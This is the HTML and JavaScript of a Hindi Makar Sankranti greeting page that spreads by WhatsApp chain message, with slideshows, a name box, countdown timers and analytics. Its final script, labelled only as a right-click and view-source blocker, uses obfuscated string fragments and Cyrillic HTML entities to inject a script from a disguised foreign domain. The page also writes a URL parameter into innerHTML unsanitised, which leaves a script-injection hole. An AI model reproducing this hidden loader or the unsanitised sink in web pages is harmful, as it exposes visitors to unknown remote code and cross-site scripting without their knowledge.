  <img src="https://hubpng.com/download/CE8YWbQQxsaDBEyt9lQkR8nf64xQ2TIjF9wgqqcoFIaFqGWHU3O2Ql5C7TOZSNurvuOuYiHXEfxDOWbgoQFag2DVDJwXcCuy0ZCmh3pQEMsmH7rhfaiqnjmSeDsn0UNXFBg1T1T4XPsH3aLjDfdUTNuZAL4q60JzCGeH1IDTHpzfnzDjWCc7evOAqHwS7I96gekEHkmb/large" style="width:80%;">

  <div class="text"></div>

</div>

<div class="mySlides fade">

  <div class="numbertext"></div>

  <img src="https://freepngimg.com/thumb/makar_sankranti/96385-makar-sankranti-text-font-logo-for-happy-eve-party.png" style="width:80%;">
  <div class="text"></div>

</div></div>

</br>
<span style="background-color: rgb(230, 255, 4); color: rgb(7, 7, 7); font-family: tahoma , arial , helvetica , sans-serif; font-size: 15pt;">&nbsp;  ❤️ यह msg 14 January तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं ❤️ </span></div>
</br>
<center>
<img height="70px" src="https://4.bp.blogspot.com/-_ZpU-nyCpMc/WyNC8YxwrfI/AAAAAAAAAaw/KXfG3ltVcsgu57_M4_Fa7dZEaRVu1EyGACLcBGAs/s1600/c.gif" width="110px" />
<br />


<div style="text-align:center">
  <span class="BDKSinghJidot"></span> 
  <span class="BDKSinghJidot"></span> 
  <span class="BDKSinghJidot"></span> 
  <span class="BDKSinghJidot"></span>
  <span class="BDKSinghJidot"></span>
  <span class="BDKSinghJidot"></span>
  <span class="BDKSinghJidot"></span>
  <span class="BDKSinghJidot"></span>
  <span class="BDKSinghJidot"></span>
</div>



.

<script>
var slideIndex = 0;
showSlides();

function showSlides() {
    var i;
    var slides = document.getElementsByClassName("BDKSinghJiSlides");
    var dots = document.getElementsByClassName("BDKSinghJidot");
    for (i = 0; i < slides.length; i++) {
       slides[i].style.display = "none";  
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1}    
    for (i = 0; i < dots.length; i++) {
        dots[i].className = dots[i].className.replace(" active", "");
    }
    slides[slideIndex-1].style.display = "block";  
    dots[slideIndex-1].className += " active";
    setTimeout(showSlides, 3000); // Change image every 3 seconds
}
</script>
<div id="formBox" >
          
<input class="animated pulse infinite" style="background-color:#F7C600; color: #FFFFFF" type="text" name="name" id="nameTextBox"  placeholder="👉 यहाँ अपना नाम लिखे ♥️">
          <div class="btnn animated shake infinite" id="goButton" onclick="createGreeting()" >
           Go👉
          </div>
        </div>          
        <a class="footerbtn" href="javascript:void(0)" onclick="shareActionWA()">
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
          <b style="font-size: 15px;position:  relative;top: -3px;margin: 0 10px;">Share with your Friends</b>
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
        </a>
    </div>
  


</body>
.
 . <script>
      var jqs = function(sParam) {
        var sPageURL = window.location.search.substring(1);
        var sURLVariables = sPageURL.split("&");
        for (var i = 0; i < sURLVariables.length; i++) {
            var sParameterName = sURLVariables[i].split("=");
            if (sParameterName[0] === sParam) {
              return sParameterName[1];
            }
          }
      };
    window.jqs = jqs;
    var name = decodeURI(jqs("bl"));
    if (typeof jqs("bl") === "undefined") {
      name = "";
    }
    var checkName = function() {
      if (name.length !== 0) {
        name = name.replace(/-/g, " ");
        console.log("name is there", name);
        document.querySelector("#BDKSinghJi-show-name").innerHTML = name;
        document.querySelector("#BDKSinghJi-fromMessage").innerHTML= ""
      } else {

      }
    };

    checkName();

    var createGreeting=function(){

      // ga('send', {
      //   hitType: 'event',
      //   eventCategory: 'interaction',
      //   eventAction: 'click',
      //   eventLabel: 'goButtonClicked'
      // });

      gtag('event', 'click', {
            'event_category': 'interaction',
            'event_label': 'goButtonClicked',
      });

      sname=document.querySelector("#nameTextBox").value;
      sname=sname.replace(/@/g,"-")
      sname=sname.replace(/%40/g,"-")
      sname=sname.replace(/\./g,"-")
      if(sname.trim()!=""){
        document.querySelector("#formBox").style.display = "none";
        document.querySelector(".footerbtn").style.display = "block";
        document.querySelector("#BDKSinghJi-show-name").innerHTML = sname;
        document.querySelector("#BDKSinghJi-fromMessage").innerHTML= "Click on the WhatsApp button to share with your friends";
        window.scrollTo(0,0);
      }else {
        alert ("Please Type Your Name First");
        document.getElementById("nameTextBox").focus();
      }
    }

    var shareActionWA = function() {
      gtag('event', 'click', {
            'event_category': 'interaction',
            'event_label': 'shareOnWhatsAppClicked',
      });

      var shareString = "";
      var whatsappHref;
      shareString += "*"+sname+"*";

      
      shareString +=" ने आपके लिए कुछ खास 🎁भेजा है%0A*🎉 जल्दी से क्लिक करो और उड़ती पतंगों का मजा लो ❤️*%0A🎖️नीचे दी गई ब्लू लाइन को क्लिक करें🙏%0A👇👇👇👇 %0A"
      shareString +=("https://co00.github.io/makar-sankranti/" + "?bl=" + sname).replace("#", "").replace(/ /g, "-");
     

      whatsappHref = "whatsapp://send?text=" + shareString;
      window.location.href = whatsappHref;

   };
    var countDownDate = new Date("January 14, 2021 00:00:00").getTime();

    // Update the count down every 1 second
    var x = setInterval(function() {
        // Get todays date and time
        var now = new Date().getTime();

        // Find the distance between now an the count down date
        var distance = countDownDate - now;

        // Time calculations for days, hours, minutes and seconds
        var days = Math.floor(distance / (1000 * 60 * 60 * 24));
        var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
        var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
        var seconds = Math.floor((distance % (1000 * 60)) / 1000);

        // Output the result in an element with id="demo"
        document.getElementById("demoo").innerHTML = days + "days " + hours + "hr "+ minutes + "min " + seconds + "sec ";

        // If the count down is over, write some text
        if (distance < 0)
         {
            clearInterval(x);
            document.getElementById("demoo").innerHTML = "";
            document.getElementById("inAdvance").innerHTML = "";

        }
    }, 1000);
  </script>
<!-- Display the countdown timer in an element -->


<script>
// Set the date we're counting down to
var countDownDate = new Date("January 14, 2021 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="BDKSinghJi"
  document.getElementById("BDKSinghJi").innerHTML = days + "<i> Days,</i> " + hours + " <i>Hrs,</i> "
  + minutes + "<i> Min,</i> " + seconds + "<i> Sec</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("BDKSinghJi").innerHTML = ".";
  }
}, 1000);
</script>    
<script src="https://www.googletagmanager.com/gtag/js?id=UA--1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA--1');
  // ga('create', 'UA--1');
  // ga('require', 'linker');
  // ga('send', 'pageview');
</script>    
<!-- This Theme edit and make by BDKSinghJi -->

<script>
var myIndex = 0;
carousel();

function carousel() {
    var i;
    var x = document.getElementsByClassName("mySlides");
    for (i = 0; i < x.length; i++) {
       x[i].style.display = "none";  
    }
    myIndex++;
    if (myIndex > x.length) {myIndex = 1}    
    x[myIndex-1].style.display = "block";  
    setTimeout(carousel, 2000); // Change image every 2 seconds
}
</script>

<script>

//** disable right click & ctrl + u javascript code **//

document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1092;'+'&#1102;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey &&  (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };

</script> 

<!-- This Theme edit and make by BDKSinghJi -->
 </html>
